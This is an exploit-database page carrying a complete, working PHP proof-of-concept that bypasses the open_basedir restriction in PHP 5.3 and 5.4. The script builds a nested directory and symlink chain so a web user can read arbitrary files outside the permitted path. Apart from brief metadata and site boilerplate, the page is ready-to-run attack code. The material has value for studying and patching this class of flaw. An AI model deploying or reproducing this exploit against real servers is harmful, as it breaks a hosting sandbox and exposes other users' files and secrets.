PHP 5.4 5.3 open_basedir bypass poc

2012.03.30
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<?php /* PHP 5.3 5.4 open_basedir bypass exploit by Maksymilian Arciemowicz http://cxsecurity.com/ cxib [ a.T] cxsecurity [ d0t] com */ $fakedir="cx"; $fakedep=16; $num=0; // offset of symlink.$num if(!empty($_GET['file'])) $file=$_GET['file']; else if(!empty($_POST['file'])) $file=$_POST['file']; else $file=""; echo '<PRE> .__ __ ____ ___ ___ ______ ____ ____ __ _________|__|/ |_ ___.__. _/ ___\\\\ \/ / / ___// __ \_/ ___\| | \_ __ \ \ __< | | \ \___ > < \___ \\\\ ___/\ \___| | /| | \/ || | \___ | \___ >__/\_ \/____ >\___ >\___ >____/ |__| |__||__| / ____| \/ \/ \/ \/ \/ \/ <p>PHP 5.4 open_basedir bypass exploit poc <p>Script for legal use only. More: <a href="http://cxsecurity.com/" alt="exploit">cxsecurity.com</a> <p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>'; if(empty($file)) exit; if(!is_writable(".")) die("not writable directory"); $level=0; for($as=0;$as<$fakedep;$as++){ if(!file_exists($fakedir)) mkdir($fakedir); chdir($fakedir); } while(1<$as--) chdir(".."); $hardstyle = explode("/", $file); for($a=0;$a<count($hardstyle);$a++){ if(!empty($hardstyle[$a])){ if(!file_exists($hardstyle[$a])) mkdir($hardstyle[$a]); chdir($hardstyle[$a]); $as++; } } $as++; while($as--) chdir(".."); @rmdir("fakesymlink"); @unlink("fakesymlink"); @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); // this loop will skip allready created symlinks. while(1) if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break; else $num++; @unlink("fakesymlink"); mkdir("fakesymlink"); die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); ?>

References:

http://cxsecurity.com/research/70


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top